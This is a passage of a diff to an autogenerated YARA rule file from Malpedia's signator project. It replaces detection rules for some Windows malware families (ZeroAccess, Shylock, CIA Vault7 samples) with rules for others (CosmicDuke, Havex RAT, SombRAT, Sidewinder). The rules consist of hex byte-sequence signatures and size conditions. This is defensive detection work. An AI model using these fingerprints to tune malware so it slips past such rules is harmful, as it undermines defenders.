"3ce75b695b98335702f80c133e38f084863185b63bd0e2de7bf59d414a1dae17" score = 75 quality = 75 tags = "FILE" @@ -140701,32 +143591,32 @@ rule MALPEDIA_Win_Gameover_Dga_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 884617 33c0 40 e9???????? 8a4601 33db 8b6c2434 } - $sequence_1 = { 397e08 0f84f0000000 8be9 894c2414 8bd1 8b4604 8a0c03 } - $sequence_2 = { 48 7544 397714 763f 8b4710 ff34b0 } - $sequence_3 = { 833d????????00 7566 8d8de8fdffff e8???????? 51 be???????? 56 } - $sequence_4 = { 5f 5b c20c00 8bcf e8???????? 8bf0 } - $sequence_5 = { 56 ff15???????? 85c0 7443 56 be???????? 8d85f8fdffff } - $sequence_6 = { 8b84245c010000 40 e9???????? 8b476c 33c9 2bc3 } - $sequence_7 = { ff760c ff7608 6a10 e8???????? 84c0 0f847a010000 8364241c00 } - $sequence_8 = { e8???????? a1???????? ff7064 ff15???????? 6a53 8d55b8 8bf0 } - $sequence_9 = { 7510 8b4f10 e8???????? 85c0 75e5 32c0 } + $sequence_0 = { c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 } + $sequence_1 = { c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e } + $sequence_2 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 } + $sequence_3 = { c7410c16d9fdf8 c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e } + $sequence_4 = { c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d } + $sequence_5 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 66c7417dfc19 } + $sequence_6 = { c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d } + $sequence_7 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 } + $sequence_8 = { c741510f9f2997 c7415565449eac c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 } + $sequence_9 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <8252416 } -rule MALPEDIA_Win_Unidentified_106_Auto : FILE +rule MALPEDIA_Win_Cosmicduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "149fd261-d790-5329-9f62-f83b72c17c68" + id = "a26b55b5-f92c-59e0-aeb7-97b4045e507d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_106_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cosmicduke_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "b7794c4f304d97457540366e3546931a6b0930939bfed6f5754198d0fc46abff" + logic_hash = "ac4cc48798cdbb14b22137cd5139a9905a17da02e3b6c8aa744a86c9cd8ba953" score = 75 quality = 75 tags = "FILE" @@ -140740,32 +143630,32 @@ rule MALPEDIA_Win_Unidentified_106_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc2 3bd5 7d14 2bea 33d2 448bc5 49c1e002 } - $sequence_1 = { d0250000ffff 3d00000d00 740e 8b4b04 53 e8???????? 413bc7 } - $sequence_2 = { e8???????? 488b8bf8000000 4889bbf0000000 e8???????? 488b8b00010000 4889bbf8000000 e8???????? } - $sequence_3 = { e8???????? e8???????? 8bc8 b881808080 f7e9 03d1 c1fa07 } - $sequence_4 = { 8bc1 418d140e 4803c6 41b800100000 66440b833c040000 4889442438 8bc2 } - $sequence_5 = { a806 0f85cf020000 bafbff0000 6623c2 6683c802 66898108030000 33c0 } - $sequence_6 = { 488d442448 4889442428 4c8bcb 488d442430 418bd7 498bce 4889442420 } - $sequence_7 = { e8???????? 85c0 7920 488b0f 488d5710 4885d2 0f8454fbffff } - $sequence_8 = { e9???????? 498b5f08 be02000000 440fb7f5 4d03f3 4180fc06 7508 } - $sequence_9 = { 90 eb02 eb00 498bc4 488b5c2478 488bac2480000000 4883c440 } + $sequence_0 = { ff542418 83c602 47 3b742428 72ce 8b4514 } + $sequence_1 = { ff8688050000 b001 5f c3 6a1f 5a 8bc1 } + $sequence_2 = { c1e104 03cb 898439142c0000 e9???????? 3975e4 7408 ff75e4 } + $sequence_3 = { 8d7c241c e8???????? 3ac3 0f84ac010000 8b442420 89442430 8d842438200000 } + $sequence_4 = { 85db 7507 32c0 e9???????? 837d1400 74f3 807d1000 } + $sequence_5 = { 6a01 68???????? 56 53 e8???????? b001 5f } + $sequence_6 = { 8bc7 8d4c2414 e8???????? 53 8d44243c 50 } + $sequence_7 = { e8???????? 0fb7c0 894510 6685c0 7512 33c0 40 } + $sequence_8 = { ff7508 8bf0 8d85ecfdffff 50 ff15???????? 8b3d???????? } + $sequence_9 = { e8???????? 84c0 742f 838c244c300000ff 8d74240c e8???????? 8b4508 } condition: - 7 of them and filesize <27402240 + 7 of them and filesize <456704 } -rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE +rule MALPEDIA_Win_Lpeclient_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "229fefe8-12a2-5321-841b-a1c5858ad20f" + id = "ff5559d0-76ba-5f50-8136-3eeb9fa351f1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lpeclient_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "121c8e165e7a80ef0b3dea83e1137d20669defc5a0d83275fbb5b7562347ae72" + logic_hash = "cc71b8a0d92e690c3547182b96989e3a466b7b3af36dfae852a2105f4c91b9a4" score = 75 quality = 75 tags = "FILE" @@ -140779,32 +143669,32 @@ rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a08 6a01 52 ff15???????? 85c0 0f859f000000 8b45d0 } - $sequence_1 = { 57 ff15???????? 8bf0 85f6 0f8470ffffff 8b85ecfdffff } - $sequence_2 = { 6a00 6a00 6a00 6a00 8d95f4fdffff 52 6a01 } - $sequence_3 = { 8bc1 c1f805 8bf1 83e61f 8d3c8520834100 8b07 } - $sequence_4 = { 0f870d0a0000 ff2485bbce4000 33c0 838df4fbffffff 898598fbffff 8985b0fbffff } - $sequence_5 = { 33d2 6806020000 52 8d85eafbffff 50 668995e8fbffff e8???????? } - $sequence_6 = { 5d c3 b984120000 b8???????? } - $sequence_7 = { 8d45f4 50 52 51 57 ff15???????? 8b4d08 } - $sequence_8 = { 50 51 ff15???????? 85c0 7420 8b55fc } - $sequence_9 = { 83ffff 7410 8d4c2420 51 } + $sequence_0 = { f0ff03 8bce e8???????? eb2b 83f8ff 7526 4c8d2567f60000 } + $sequence_1 = { 33c0 80f90a 0f94c0 8944244c 488d054a1b0100 } + $sequence_2 = { 33c0 488bfe 66f2af 48f7d1 48ffc9 0f8456010000 } + $sequence_3 = { e8???????? c1eb03 85db 0f8e52130000 8b4c2450 8b542450 4c8d5e02 } + $sequence_4 = { 498be3 5f c3 48895c2410 4889742418 57 4881ec30020000 } + $sequence_5 = { 7406 81f1783bf682 48ffc7 48ffca 75e6 443bc1 410f94c5 } + $sequence_6 = { 0fb64c38ff 4132c8 880a 4183c10b 41ffc2 } + $sequence_7 = { 0bd8 418b0424 8d0c03 8bfb 448bc1 48c1e918 83e10f } + $sequence_8 = { 488d0d0f570100 ff15???????? 4c8b4308 488d1546e90000 488d0df74e0100 ff15???????? 488d0d9a480100 } + $sequence_9 = { 33db c74424646b000000 ff15???????? 448d4b01 448d4307 488d95a00b0000 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <289792 } -rule MALPEDIA_Win_Httpdropper_Auto : FILE +rule MALPEDIA_Win_Havex_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eb6cb470-4fa5-55f1-aaf4-34eabe7782e1" + id = "cb4848d9-dd93-5427-b320-640a482386ab" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpdropper_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.havex_rat_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "c6973c071283bf0dc986d288edaa8567196f172f5da7a23c655925f94d3c03cb" + logic_hash = "fa73eedcf8aaa6cbc56ae3cdeefa1daf5290fc7704b83fa7deffe1125fde8d25" score = 75 quality = 75 tags = "FILE" @@ -140818,38 +143708,32 @@ rule MALPEDIA_Win_Httpdropper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c243c 51 8d54241c 52 53 } - $sequence_1 = { 51 6a00 6a00 68???????? 52 c745f404000000 } - $sequence_2 = { 7506 c60100 49 ebec 8bc3 } - $sequence_3 = { e8???????? 6804010000 8d95edfdffff 6a00 52 c685ecfdffff00 } - $sequence_4 = { 7414 57 c6470300 e8???????? 83c404 } - $sequence_5 = { 51 8d95ecf8ffff 68???????? 52 e8???????? 8d85f4fdffff } - $sequence_6 = { 6802000080 ff15???????? 8b85d8fbffff 8d8ddcfbffff 51 } - $sequence_7 = { c685d4f4ffff00 e8???????? 57 68ff030000 } - $sequence_8 = { 33c0 ba01000000 f2ae 448bc2 48f7d1 48ffc9 } - $sequence_9 = { 48c7c102000080 4889442438 48897c2430 c74424283f000f00 897c2420 } - $sequence_10 = { 33d2 41b804010000 c68424f000000000 e8???????? 488d15520f0200 488d8c24f0000000 } - $sequence_11 = { 488bfb 488d73ff f2ae 48f7d1 48ffc9 } - $sequence_12 = { 0fb7cd 4889442428 6689742428 4889442430 ff15???????? 488bcf } - $sequence_13 = { e8???????? 488d8d81040000 33d2 41b87f0c0000 } - $sequence_14 = { c1e808 418bd1 4032c7 4a0fbebc35da020000 81e2fdff0000 } - $sequence_15 = { 488d4df0 e8???????? b801000000 e9???????? } + $sequence_0 = { 134304 8937 ebd8 8917 c74704ffffff7f 8bc7 5e } + $sequence_1 = { 0fb7c0 b9ffff0000 663bc8 7576 834dec04 33f6 3975ec } + $sequence_2 = { e8???????? 8bcf c745dcac230510 e8???????? e8???????? c20400 6a30 } + $sequence_3 = { 297d78 c78580000000feffffff 29bd80000000 8d4417ff 660fb67801 66c1e908 66c1e708 } + $sequence_4 = { 56 8d8550feffff e8???????? ff757c 8d8550feffff ff7574 } + $sequence_5 = { 8b7d08 59 59 3bc3 7404 8938 eb02 } + $sequence_6 = { 84c0 0f854bffffff 33f6 e9???????? 8bb5c8fdffff e9???????? 55 } + $sequence_7 = { 740a 6683f85c 0f858e000000 83c8ff 5f 5e 5b } + $sequence_8 = { 68???????? 8d4c2414 e8???????? 8d442410 50 8d4c2430 897c2464 } + $sequence_9 = { 5b c9 c3 55 8bec 8b4614 83ec10 } condition: - 7 of them and filesize <524288 + 7 of them and filesize <892928 } -rule MALPEDIA_Win_Zeroaccess_Auto : FILE +rule MALPEDIA_Win_Sombrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dc18e525-3177-5057-b2b8-44deb0459882" + id = "829e34aa-1da2-5a33-9238-c1cc0c096058" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeroaccess_auto.yar#L1-L151" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sombrat_auto.yar#L1-L149" license_url = "N/A" - logic_hash = "4423d17d4505fc4e1d7ad61f77b371f17ded461805f238fd1e8f686647ad897a" + logic_hash = "a1432e014afc208b0318e2ead477453bc5bd4bddb98bd4c2d60380403a2290c4" score = 75 quality = 75 tags = "FILE" @@ -140863,37 +143747,38 @@ rule MALPEDIA_Win_Zeroaccess_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 7408 ff15???????? eb02 } - $sequence_1 = { 56 56 6a20 6a05 } - $sequence_2 = { bf03000040 eb05 bf010000c0 85ff } - $sequence_3 = { 6a01 8d45f4 50 ff7308 ff15???????? 85c0 } - $sequence_4 = { 6a04 68???????? 6a10 68???????? 68060000c8 ff7708 ff15???????? } - $sequence_5 = { ff15???????? 85c0 7407 b8e3030000 } - $sequence_6 = { 56 6a10 8945e8 8d45e4 } - $sequence_7 = { e8???????? 50 6819000200 8d45f8 } - $sequence_8 = { 3bc1 7604 83c8ff c3 } - $sequence_9 = { 50 68???????? 6889001200 8d45fc } - $sequence_10 = { 56 8d45f8 50 ff15???????? 6a01 8d45f8 50 } - $sequence_11 = { 33c0 48 83c9ff c744242804000000 48 } - $sequence_12 = { 85db 741f 8b4304 49 } - $sequence_13 = { 7615 83780815 750f c705????????01000000 } - $sequence_14 = { 48 83ec20 41 8bf9 48 8bd9 } + $sequence_0 = { 014114 8b7508 837df800 8b5df4 } + $sequence_1 = { 01041e 8b4508 42 8d7308 } + $sequence_2 = { 0144244a 894e0c ffb72c010000 ff15???????? } + $sequence_3 = { 01420c 8b11 294210 8b09 } + $sequence_4 = { 0145e4 8b55f8 83c40c 294644 } + $sequence_5 = { 0000 e8???????? c70424???????? 8d5f0c 68???????? } + $sequence_6 = { 7514 8b4610 8d8de4fffeff 2b4618 03c3 } + $sequence_7 = { 014114 014620 f6460c04 8945e0 742d } + $sequence_8 = { 015f08 33c0 488b4c2470 4833cc } + $sequence_9 = { 0145f1 4533c9 4533c0 488b16 } + $sequence_10 = { 016b08 488d05dc980500 41b9e7160000 4889442420 } + $sequence_11 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 } + $sequence_12 = { 016b08 33c0 e9???????? 33ff } + $sequence_13 = { 01448c20 48ffc1 493bc9 7cf1 } + $sequence_14 = { 015f08 33c0 e9???????? 488b4760 } + $sequence_15 = { 015f08 488bcf e8???????? 8bf0 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <1466368 } -rule MALPEDIA_Win_Kivars_Auto : FILE +rule MALPEDIA_Win_Penco_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "81082c3d-5064-55a3-8cee-83fb88e85d6c" + id = "0506b7c6-0597-5673-b29d-0e2e4b0bbb8c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kivars_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.penco_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "57db268647853b0be399381edf4cd6dc1a86ac28f0c0a8c22aae4b45830a7fb0" + logic_hash = "b907c123e9f48e051972fa4ccfde76e3114fafc16984b4ff739806928ca43da4" score = 75 quality = 75 tags = "FILE" @@ -140907,38 +143792,32 @@ rule MALPEDIA_Win_Kivars_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c705????????00000000 c644245423 c744245002000000 488d4c2450 e8???????? } - $sequence_1 = { 8d542440 8944244c 894c243c 6a14 } - $sequence_2 = { 8d8c247c010000 51 e8???????? 83c404 33c0 5f 5e } - $sequence_3 = { 44894c2420 4c89442418 89542410 48894c2408 4881eca8000000 488b05???????? } - $sequence_4 = { ff15???????? 8bc8 8d7308 83e908 8dbc2492000000 8bd1 } - $sequence_5 = { 4889842470020000 ff15???????? 89842430020000 c784242002000001000000 c784242c02000002000000 c64424707d } - $sequence_6 = { 755d 4c8b8424e0050000 488d942460020000 488d8c2450010000 e8???????? } - $sequence_7 = { 4883c005 4889442428 488b842470100000 4883c009 } - $sequence_8 = { 894c2430 89442444 894c2434 89442448 894c2438 8d542440 8944244c } - $sequence_9 = { 488d942440010000 488d4c2430 e8???????? 8b442434 83e001 85c0 } - $sequence_10 = { 50 8b4d18 51 8d5514 } - $sequence_11 = { 7476 eb09 80fb3d 0f8489000000 0fbe5c2412 c0e202 8a5c1c14 } - $sequence_12 = { 488bc8 ff15???????? 8b842460110000 ffc0 } - $sequence_13 = { 83fffe 741b 83ffff 0f858c000000 8d8c247c010000 } - $sequence_14 = { 8bf0 83c609 33ff 6a74 897c2414 e8???????? 83c404 } - $sequence_15 = { 48894c2408 4881ec68030000 48c7842448030000feffffff 488d8c2430010000 e8???????? } + $sequence_0 = { 53 6a01 6800000080 8d9500010000 52 8b1d???????? } + $sequence_1 = { 3334bd00d83400 0fb67c2414 3334bd00d43400 8b4c241c 33700c 83c010 8bde } + $sequence_2 = { 40 89442418 3b442414 0f82fffeffff eb13 8d042e 68???????? } + $sequence_3 = { 741c 68???????? 68ff010f00 56 ff15???????? 56 85c0 } + $sequence_4 = { 0fbe80e8983400 83e00f 33f6 eb04 33f6 33c0 } + $sequence_5 = { 8d4598 50 6a00 6a00 8d4db8 51 8b55a4 } + $sequence_6 = { 33c0 84c9 7428 8d642400 80f930 7c1c 80f939 } + $sequence_7 = { 894c2418 8b4c2444 f7f1 33d2 c744242001000000 03442410 89442414 } + $sequence_8 = { 7504 8bf0 eb3e 6a0a } + $sequence_9 = { 8b349528e83400 8b542428 0fb6f9 3334bd00d83400 8b4c241c c1ea18 33349528ec3400 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Shylock_Auto : FILE +rule MALPEDIA_Win_Sidewinder_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c0c6612f-064a-5f55-82bb-f58e63a548a1" + id = "476f112b-78c8-59d9-8623-54ca0fa7fd69" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shylock_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sidewinder_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "2cab0a97d5d39d5cf87c312cbde6ff184fa1776200cc626b918f5dce9951a83d" + logic_hash = "eff1c6e4779cf645096e1bcfd05e39d6cbab1c4bd8a928e81992c305a580a163" score = 75 quality = 75 tags = "FILE" @@ -140952,32 +143831,32 @@ rule MALPEDIA_Win_Shylock_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d8534ffffff 50 b8???????? e8???????? 59 50 } - $sequence_1 = { 8db544ffffff e8???????? 8bc6 50 8d45f8 e8???????? ff30 } - $sequence_2 = { c22c00 0fb64001 50 8d45c8 50 8b45d4 8b30 } - $sequence_3 = { c745fc04010000 ff75e4 e8???????? 83c410 ff45f8 3d03010000 0f8559ffffff } - $sequence_4 = { e8???????? 3c01 743b 8d8588feffff 50 b8???????? e8???????? } - $sequence_5 = { 57 8b7d08 8b4d0c 8a4510 fc f2ae 7504 } - $sequence_6 = { 8945b0 8d856cffffff 50 8b45fc ff7018 ff9540ffffff 898534ffffff } - $sequence_7 = { 8d75f8 8bfc e8???????? 8d8504ffffff 50 ff7508 e8???????? } - $sequence_8 = { 51 33d2 8d5df8 e8???????? 8d45ec e8???????? 8bf8 } - $sequence_9 = { e8???????? e8???????? 59 59 8bf0 e8???????? 8d75fc } + $sequence_0 = { 83a570fdffff00 8b45c4 89853cffffff 8d8544ffffff 50 8b853cffffff 8b00 } + $sequence_1 = { 50 e8???????? 89852cfbffff e8???????? 8d8568fbffff 50 e8???????? } + $sequence_2 = { e8???????? 8d45c4 50 8d45a0 50 e8???????? 8d45a0 } + $sequence_3 = { 8d45e0 50 e8???????? 0fbf45e8 50 ff75e0 e8???????? } + $sequence_4 = { 7d20 6a30 68???????? ff35???????? ffb534ffffff e8???????? 898504ffffff } + $sequence_5 = { 8b00 ff7508 ff5004 8b450c 832000 8d45e8 50 } + $sequence_6 = { e8???????? 8bd0 8d4de8 e8???????? 8d45c8 50 8d45d8 } + $sequence_7 = { ff5020 dbe2 898528ffffff 83bd28ffffff00 7d1d 6a20 68???????? } + $sequence_8 = { 8945dc 8d45e4 50 8b45dc 8b00 ff75dc ff5024 } + $sequence_9 = { ff75b8 ff75d8 6aff 6820110000 e8???????? 83650c00 eb27 } condition: - 7 of them and filesize <630784 + 7 of them and filesize <679936 } -rule MALPEDIA_Win_Sierras_Auto : FILE +rule MALPEDIA_Win_Brbbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "605d6eab-f109-574e-b05c-a9ae83591a9c" + id = "e240fcbc-2659-5f11-92b2-f24493c78ffd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sierras_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brbbot_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "a564c7fabb45cfabecce73bb6168ff37faec379b0995b89fe8defbd9d38cf80c" + logic_hash = "d23aa206f76a72b99ca843cfc9c1f11b947cf7f249b06e1b49eb77df3aca0670" score = 75 quality = 75 tags = "FILE" @@ -140991,38 +143870,32 @@ rule MALPEDIA_Win_Sierras_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f3a4 8d8c2424050000 8d942430080000 51 } - $sequence_1 = { 56 8bf1 57 68???????? 8d4604 50 } - $sequence_2 = { 50 8d45e0 50 e8???????? eb0f 8b4dec } - $sequence_3 = { e8???????? 50 8d442430 50 8d8c24ec000000 } - $sequence_4 = { 0f8480030000 8b4dfc ff4df8 0fb611 8bcf } - $sequence_5 = { 7507 e8???????? eb05 e8???????? 0175f0 } - $sequence_6 = { 8bf1 e8???????? 8b8698010000 5e } - $sequence_7 = { 8bc8 83e103 f3a4 8bbc2410040000 } - $sequence_8 = { 03fb 3b7d10 72b0 8b5df0 834dfcff 8d4de0 } - $sequence_9 = { 8bf1 33db 6a01 6a78 } - $sequence_10 = { f2ae f7d1 2bf9 8d942480000000 8bf7 8bd9 8bfa } - $sequence_11 = { 8bf1 e8???????? 8b8608010000 5e c3 56 } - $sequence_12 = { 397d08 897dfc 0f8cc0000000 837d0801 7e58 } - $sequence_13 = { c7401880dd4000 e9???????? 83e00f c70613000000 894648 8b4648 85c0 } - $sequence_14 = { 58 0fb688c88c4000 6683bc8e7e0a000000 7506 } - $sequence_15 = { 3bf8 7cce 8b442418 83c520 40 83f803 89442418 } + $sequence_0 = { 7509 488d0daad10000 eb02 33c9 e8???????? 4883c438 } + $sequence_1 = { f2ae 48f7d1 48ffc9 4c8bc1 498d8e10040000 488bd5 e8???????? } + $sequence_2 = { 48f7d1 4c8d41ff 488d8b04010000 e8???????? } + $sequence_3 = { 885c2470 448bee 448bfe e8???????? 488b05???????? 4889442458 } + $sequence_4 = { 48895808 488970e8 33ff 488978b8 4c8960e0 } + $sequence_5 = { 48f7d1 48ffc9 4881f904010000 0f8724010000 4883c9ff } + $sequence_6 = { 81fa01010000 7d13 4863ca 8a44191c 42888401c0230100 } + $sequence_7 = { 488bfa ff15???????? 4c8d4704 488bc8 ba08000000 ff15???????? } + $sequence_8 = { 4c8b7540 8bd8 85c0 0f88d6020000 4c8d4da8 } + $sequence_9 = { 33d2 488bce e8???????? ff15???????? 4c8bc6 488bc8 33d2 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <198656 } -rule MALPEDIA_Win_8Base_Auto : FILE +rule MALPEDIA_Win_Unidentified_105_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c9b0c56-079f-5ac3-b0fc-c036345ce952" + id = "80a8f5ec-0d23-5074-b907-8dcd99006ffb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.8base_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_105_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "ea755be9fd3154ace1513f9f57e59c67fbe5ae97b6b4073ab7fa5cccbb0a5bb8" + logic_hash = "03b63f792ccab1aa0e70284622fef7dcf74ab6cde5a0b9206fdbab8d689a2bd1" score = 75 quality = 75 tags = "FILE" @@ -141036,32 +143909,32 @@ rule MALPEDIA_Win_8Base_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 ff15???????? 8d8e04a2feff 81f98c230000 770b } - $sequence_1 = { f8 290c67 98 a6 73c2 } - $sequence_2 = { 8815???????? c605????????6f 880d???????? c605????????65 c605????????63 } - $sequence_3 = { 8d3485c0289100 8b06 83e71f c1e706 03c7 8a5824 } - $sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? } - $sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 } - $sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? } - $sequence_7 = { 8bf7 83e61f c1e606 033485c0289100 c745e401000000 } - $sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c } - $sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 } + $sequence_0 = { 85c0 0f95c0 84c0 742c } + $sequence_1 = { 8bf8 8d4f02 b856555555 f7e9 8bc2 c1e81f 03c2 } + $sequence_2 = { 6a00 8d8dd0feffff 51 8d95fcfeffff } + $sequence_3 = { 8d8d94feffff 51 6800000010 50 52 ff15???????? 85c0 } + $sequence_4 = { e8???????? 83c404 50 e8???????? a1???????? 6800020000 } + $sequence_5 = { 83f8ff 7459 8d9424a0010000 52 } + $sequence_6 = { 68???????? 56 e8???????? 8bc6 83c454 } + $sequence_7 = { 8bf8 8d4f02 b856555555 f7e9 8bc2 } + $sequence_8 = { 8b3d???????? 8d45e4 50 33f6 } + $sequence_9 = { 6800100000 8d85f8efffff 50 51 } condition: - 7 of them and filesize <10838016 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Cloudeye_Auto : FILE +rule MALPEDIA_Win_Ruckguv_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "55cebb53-71a5-52d8-a3dc-f73efa113a86" + id = "70c59136-1542-5cb3-8c7d-52dba7e0bc40" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudeye_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ruckguv_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "ce7b005739a8ed2a89f930168aa824ea8a88d8cc7cac3881e5d28b500fe73c46" + logic_hash = "a64635c0a8f169255c2ded62c13acd231a3b9a4460e9b10acd2e149c6348dd85" score = 75 quality = 75 tags = "FILE" @@ -141075,32 +143948,32 @@ rule MALPEDIA_Win_Cloudeye_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c002 668b1c08 668b140e 6639d3 75e4 83e902 83f900 } - $sequence_1 = { 7545 66f7c14179 685595db6d e8???????? } - $sequence_2 = { e8???????? 5f 59 83c628 41 3b8f04080000 75a8 } - $sequence_3 = { 7408 0185f4000000 eba4 85d8 } - $sequence_4 = { 89f8 0500080000 50 6aff } - $sequence_5 = { 6685d2 e8???????? 84ef 80fd37 